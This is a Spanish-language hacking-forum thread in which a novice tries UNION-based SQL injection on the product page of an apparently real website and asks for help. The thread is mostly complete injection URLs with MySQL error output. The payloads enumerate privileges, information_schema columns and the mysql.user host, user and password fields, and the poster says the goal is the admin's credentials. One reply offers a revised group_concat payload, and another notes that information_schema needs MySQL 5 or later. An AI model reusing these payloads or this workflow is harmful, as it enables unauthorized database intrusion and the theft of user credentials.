Vale en esta web tengo:
http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
Ya que hay 36-
La versioón del Mysql es : 4.1.22
La base de Datos: qar139
Usuario " Creo" : qar139@%
El tema es , intento sacar mas info como por ejemplo la lista de privilegios:
http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+information_schema.user_privileges--
pero me da este error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 53
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 75
puede ser a la version del Mysql??? si es el caso alguien sabe como hacer la quiery correcta???
Gracias
Que raro, cuando estuvé en las iSQL solo queria sacar al user y pass del admin. Ahora no sé que es lo que estas haciendo vos... =F
jejejejeje, quiero ver las columnas de la base de datos, en ella hay una de usuarios supongo y no la puedo listar.... gracias
para poder ver el password...
What The Fuck!
lo siento los newbabys como yo aprendemos de maestros como vosotros, buscando .... gracias
intentando ver las columnas:
http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,concat%28table_schema,0x3a,table_name,0x3a,column_name%29%20,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+information_schema.columns--
pero nada mysql error....
Pues resulta que la consulta esta mal planteada, es por eso que te retorna ese error. La query retorna falso y por ende mysql_num_rows y mysql_fetch_array muestra ese error. (valga la redundancia xD)
Haz mirado tutorial de iSQL?
si he leido y estoy leyendo, por ejemplo uso:
http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,concat%28host,0x3a,user,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+mysql.user--
para sacr user y pass, pero nada me tira error
Intentad así:
id=-1+union+all+select+1,group_concat(host,0x3a,user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+mysql.user--
gracias, pero me da el mismo error, no lo termino de entender!!!
Que error?
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 53
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 75
mmm ya sé cual es él problema... Mira lo que pasa esque la version de MySQL debe ser >= 5 para que tenga information_schema de lo contrario no podras usarlo.
primero aprende lenguaje sql en mysql y php, despues intenta buscar vulnerabilidades.
http://foro.elhacker.net/nivel_web/iquestcomo_iniciarse_en_la_seguridad_web-t279791.0.html
saludos desde el año 1999 que programa con php y mysql, pero bueno siempre se puede estudiar mas :rolleyes: